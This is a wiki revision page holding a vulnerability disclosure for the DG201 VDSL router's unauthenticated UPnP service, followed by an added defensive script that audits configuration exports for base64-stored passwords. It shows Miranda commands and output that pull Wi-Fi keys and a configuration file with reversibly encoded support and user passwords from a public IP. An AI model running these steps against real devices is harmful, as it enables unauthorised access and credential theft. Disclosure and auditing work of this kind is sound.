Differences between revisions 1 and 2
Revision 1 as of 2015-12-30 10:05:53
Size: 2711
Editor: turmio
Comment:
Revision 2 as of 2015-12-30 10:06:46
Size: 2724
Editor: turmio
Comment:

Intro

This vulnerability was reported on 2013-11-22 and was fixed a couple of months after that.

The DG201 VDSL box has some kind of UPnP service open to the Internet by default. Even if the box is set to bridge mode, it will still take its own public IP address from the Internet.

From the UPnP service you can, for example, download the device configuration, which includes passwords etc. It is also possible to change the configuration of the device. Everything can be done without any authentication.

  • Software version: DG201A-W2U4U_4.06DNT0934.2

Details

The UPnP service can be found on TCP port 49431.

Get a UPnP client and start using the service. I used miranda: https://code.google.com/p/miranda-upnp/

Example

I have manually added my public IP to the configuration, which is basically a list of hosts in a Python pickle.

$ python miranda.py -s upnp-inteno.mir 

Miranda v1.3
The interactive UPnP client
Craig Heffner, http://www.devttys0.com


Host data restored:

        [0] 10.0.2.187:8888
        [1] 192.168.1.1:49431
        [2] 192.168.1.1:49431
        [3] 213.216.x.x:49431
        [4] 85.131.x.x:49431

upnp> host get 3

Requesting device and service info for 213.216.x.x:49431 (this could take a few seconds)...

Host data enumeration complete!

upnp> host send 3 LANDevice WLANConfiguration GetSecurityKeys

NewWEPKey3 : 1234567890123
NewWEPKey2 : 1234567890123
NewWEPKey1 : 1234567890123
NewWEPKey0 : 1234567890123
NewKeyPassphrase : 
NewPreSharedKey : abbaabba
upnp> host send 3 InternetGatewayDevice DeviceConfig GetConfiguration

NewConfigFile : <?xml version="1.0"?>
<DslCpeConfig version="3.0">
  <InternetGatewayDevice>
    <LANDeviceNumberOfEntries>1</LANDeviceNumberOfEntries>
    <WANDeviceNumberOfEntries>3</WANDeviceNumberOfEntries>
    <DeviceInfo>
      <ProvisioningCode>12345</ProvisioningCode>
      <FirstUseDate>2012-04-11T14:46:01+00:00</FirstUseDate>
      <VendorConfigFileNumberOfEntries>0</VendorConfigFileNumberOfEntries>
    </DeviceInfo>
    <X_BROADCOM_COM_SyslogCfg>
      <Status>Enabled</Status>
      <Option>local buffer and remote</Option>
      <LocalDisplayLevel>Debug</LocalDisplayLevel>
      <ServerIPAddress>10.0.0.1</ServerIPAddress>
    </X_BROADCOM_COM_SyslogCfg>
    <X_BROADCOM_COM_LoginCfg>
      <SupportPassword>ZG5hcjNzY3VlMTEyAA==</SupportPassword>
      <UserPassword>dXNlcgo=</UserPassword>
    </X_BROADCOM_COM_LoginCfg>

...
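
An added example (not part of the original page or the vendor's software): a defender-side audit of a saved configuration export that lists password elements stored as reversible base64 rather than as hashes, which is why the unauthenticated GetConfiguration download above amounts to a credential leak. The sample XML and its values are constructed, and the function name `reversible_secrets` is hypothetical.

```python
import base64
import binascii
import xml.etree.ElementTree as ET

# Constructed sample in the same layout as the configuration dump above;
# the values are made up for this example.
SAMPLE_CONFIG = """<?xml version="1.0"?>
<DslCpeConfig version="3.0">
  <InternetGatewayDevice>
    <DeviceInfo>
      <ProvisioningCode>12345</ProvisioningCode>
    </DeviceInfo>
    <X_BROADCOM_COM_LoginCfg>
      <SupportPassword>ZXhhbXBsZS1zdXBwb3J0AA==</SupportPassword>
      <UserPassword>ZXhhbXBsZQo=</UserPassword>
    </X_BROADCOM_COM_LoginCfg>
  </InternetGatewayDevice>
</DslCpeConfig>
"""

def reversible_secrets(config_xml):
    """Return (element path, decoded length) for password/key elements
    whose value is plain base64 of printable text, i.e. not hashed."""
    findings = []

    def walk(node, path):
        here = path + "/" + node.tag
        value = (node.text or "").strip()
        if value and ("Password" in node.tag or "Key" in node.tag):
            try:
                raw = base64.b64decode(value, validate=True)
            except (binascii.Error, ValueError):
                raw = b""  # not base64, e.g. a crypt-style hash
            # The values shown above decode with a trailing NUL or newline.
            text = raw.rstrip(b"\x00\n")
            if text and all(32 <= b < 127 for b in text):
                findings.append((here, len(text)))  # report length only
        for child in node:
            walk(child, here)

    walk(ET.fromstring(config_xml), "")
    return findings

if __name__ == "__main__":
    for path, length in reversible_secrets(SAMPLE_CONFIG):
        print(f"{path}: recoverable secret, {length} characters")
```

Any element this reports should be treated as disclosed wherever the configuration file has been exposed, and the corresponding password changed.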

Contacts